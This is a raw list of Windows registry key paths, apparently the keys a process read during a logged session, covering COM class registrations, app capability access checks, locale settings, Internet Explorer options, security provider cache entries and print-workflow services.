HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37987DB6-9D85-4381-8D7D-3189661223D1}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\AppPackageType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\PackageSid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\CapSids
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapAuthz\ApplicationsEx\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ApplicationFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\PackageOrigin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModel\StateRepository\Cache\Package\Data\10\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\WindowsUdk.ApplicationModel.AppExtensions.AppExtensionCatalog\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\packageQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.AppExtension\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\SortOrderIndex
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\ColorPrevalence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\SystemUsesLightTheme
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\EnableTransparency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\IsFeedsAvailable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NowPlayingSessionManager\LocalProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D0D73345-806E-4526-8AD6-3B3BB2EC2895}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\ActivePolicyCode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess\ActivePolicyCode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\accessoryManager\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\activity\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appDiagnostics\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointments\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\appointmentsSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\backgroundSpatialPerception\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.genericAttributeProfile\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetooth.rfcomm\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothAdapter\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\bluetoothSync\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularData\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\cellularDeviceControl\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chat\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\chatSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\comPort\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contacts\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\contactsSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\documentsLibrary\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\email\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\emailSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\gazeInput\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\humanInterfaceDevice\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClient\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClientServer\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectAudio\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectVision\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\location\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\locationHistory\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\lowLevel\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\microphone\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\optical\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCall\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistory\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistoryPublic\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistorySystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\pointOfService\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\preemptiveCamera\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\privateNetworkClientServer\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\proximity\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\radios\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sensors.custom\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\serialCommunication\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sms\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\smsSend\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\usb\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\Apps\Windows.ImmersiveControlPanel_cw5n1h2txyewy\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasks\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasksSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userNotificationListener\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\videosLibrary\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\webcam\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiControl\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wifiData\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiDirect\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\cellularData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\backgroundMediaPlayback
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0F4521BE-A0B8-4116-B3B1-BFECEBAEEBE6}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D22F448D-39DC-415F-8325-91EDDF0D5264}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\wifiData
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\jvaqbjf.vzzrefvirpbagebycnary_pj5a1u2gklrjl!zvpebfbsg.jvaqbjf.vzzrefvirpbagebycnary
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOutSeconds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseActivationAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\splwow64.exe\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\10
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SynchronousPrintHandleAccessMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\PrinterDriverUnloadTimeOutMinutes
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\AppID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\EnableJavaScriptDebugging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64\(Default)
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe\JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CommandLine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\IdentityType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ActivatableClasses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServerType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Identity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServiceName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExplicitPsmActivationType
